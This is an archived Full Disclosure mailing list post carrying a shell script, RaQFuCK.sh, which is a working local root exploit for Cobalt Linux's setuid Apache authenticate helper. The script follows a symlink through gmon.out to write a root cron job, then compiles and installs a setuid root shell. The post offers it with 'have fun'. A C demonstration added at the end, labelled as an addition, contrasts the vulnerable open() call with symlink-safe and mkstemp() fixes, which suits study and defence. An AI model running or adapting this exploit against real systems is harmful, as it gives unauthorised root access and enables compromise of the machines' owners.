Full Disclosure mailing list archives

Cobalt Linux Apache Local Root Exploit


From: full-disclosure () lists netsys com (Charles Stevenson)
Date: Tue, 20 Aug 2002 14:33:47 -0600


I've been sitting on this a while but what the hell... have fun.

peace,
core

-- 
  Charles Stevenson (core) <core () bokeoa com>
  Lab Assistant, College of Eastern Utah San Juan Campus
  http://www.bokeoa.com/~core/core.asc


Attachment: RaQFuCK.sh (application/x-sh)

#!/bin/sh
#
# Cobalt Linux 6.0 Local Root Exploit
#
# Effects: <= apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;)
# Quick Fix: su - root -c "chmod 755 /usr/lib/authenticate"
#
# Problem Source Code:
# fd = open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666);
#
# Suggested Code:
# fd = mkstemp("/tmp/gmon.out-XXXXXX");
#
# Still need help Cobalt developers? Ok:
# man 3 tmpfile; man 2 open; echo "Thanks core"
#
# by Charles Stevenson <core () bokeoa com>
#
# Fri Jun 28 03:35:53 MDT 2002
# - initial version
# Sun Jul  7 20:12:41 MDT 2002
# - added some features for robustness

echo "RaQFuCK.sh by core"

target="/usr/lib/authenticate"
tempdir="/tmp"

if [ -u /.sushi ] ; then
    exec /.sushi
fi

printf "Checking for $target..."
if [ -f "$target" ] ; then
    echo "done."
else
    echo "NO!"
    exit 1
fi

printf "Checking if $target is setuid root..."
if [ -u "$target" ] ; then
    echo "done."
else
    echo "NO! Hrm... does this admin have a clue???"
    exit 1
fi

if [ ! -d "$tempdir/core" ]; then
    printf "Creating $tempdir/core..."
    if ! mkdir "$tempdir/core" 2>/dev/null ; then
        echo "FAILED!" ; exit 1
    fi
    echo "done."
fi

printf "Changing directory to $tempdir/core..."
if ! cd "$tempdir/core" 2>/dev/null ; then
    echo "FAILED!" ; exit 1
else
    echo "done."
fi

printf "Creating cron.d symlink..."
if ! ln -fs /etc/cron.d/core gmon.out 2>/dev/null; then
    echo "FAILED!" ; exit 1
else
    echo "done."
fi

printf "Changing umask..."
if ! umask 000 ; then
    echo "FAILED!" ; exit 1
else
    echo "done."
fi

printf "Compiling root shell..."
cat >sushi.c <<EOF
#include <unistd.h>
int main (int argc, char **argv, char **envp) {
    setuid(0);
    setgid(0);
    execve("/bin/sh",argv,envp);
    return -1;
}
EOF
if ! cc sushi.c -o sushi 2>/dev/null; then
    echo "FAILED!" ; exit 1
else
    echo "done."
fi

printf "Compiling cron takeover..."
cat >takeover.c <<EOF
#include <stdlib.h>
main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); }
EOF
if ! cc takeover.c -o own 2>/dev/null; then
    echo "FAILED!" ; exit 1
fi
echo "done."

printf "Performing symlink attack..."
printf "\n\n\n\n" | "$target"
if [ -u /etc/cron.d/core ] ; then
    echo "SYMLINK ATTACK FAILED!" && exit 1
else
    echo "done."
fi

printf "Setting up evil cron job..."
cat >croncore <<EOF
*/1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own"; fi
EOF
if ! cat croncore 2>/dev/null >/etc/cron.d/core; then
    echo "FAILED!" ; exit 1
else
    echo "done."
fi

printf "Waiting for root shell"
while [ ! -u /.sushi ] ; do
    sleep 1 ; printf "."
done
echo "done."

cd /

printf "Cleaning up real quick..."
if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then
    echo "FAILED??? Fuck it!"
else
    echo "done."
fi

echo "Spawning root shell!!! God Damn! I say GOD DAMN!!"
if ! exec /.sushi -i; then
    echo "Exec Failed!!! BUMMER!" ; exit 1
fi
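Added example, not from the original post or from Cobalt's Apache build: the open() pattern quoted in the script header placed beside a symlink-safe variant and the mkstemp() fix the header suggests, exercised on a constructed directory under /tmp (the directory, file and function names are constructed for this demonstration).

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The call quoted in the script header: fixed name, O_CREAT|O_TRUNC, no
 * O_EXCL. A planted symlink named gmon.out is followed, so the link target
 * is created or truncated with the privileges of the setuid process. */
int open_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened form for a name that must stay fixed: O_EXCL fails on any
 * pre-existing name (a symlink included, regardless of its target) and
 * O_NOFOLLOW refuses a symlink at the final component. */
int open_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed layout: <dir>/victim holds data, <dir>/gmon.out -> victim.
 * Returns 1 when open_unsafe() follows the link and empties victim while
 * open_safe() refuses and mkstemp() (the header's fix) succeeds. */
int demo_gmon_symlink(void)
{
    char dir[] = "/tmp/gmondemo.XXXXXX", victim[64], lnk[64], tmpl[64];
    struct stat st;
    int fd, ok;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/gmon.out", dir);
    snprintf(tmpl, sizeof tmpl, "%s/gmon.out-XXXXXX", dir);
    fd = open(victim, O_WRONLY | O_CREAT, 0600);
    ok = fd >= 0 && write(fd, "secret", 6) == 6 && close(fd) == 0
         && symlink(victim, lnk) == 0;
    /* unsafe: open succeeds through the link and victim is now 0 bytes */
    fd = ok ? open_unsafe(lnk) : -1;
    ok = fd >= 0 && close(fd) == 0 && stat(victim, &st) == 0 && st.st_size == 0;
    /* safe: refused; Linux reports EEXIST (ELOOP would be O_NOFOLLOW's) */
    ok = ok && open_safe(lnk) == -1 && (errno == EEXIST || errno == ELOOP);
    /* mkstemp: fresh unpredictable name, created with O_EXCL internally */
    fd = ok ? mkstemp(tmpl) : -1;
    ok = fd >= 0 && close(fd) == 0 && unlink(tmpl) == 0;
    unlink(lnk); unlink(victim); rmdir(dir);
    return ok;
}
```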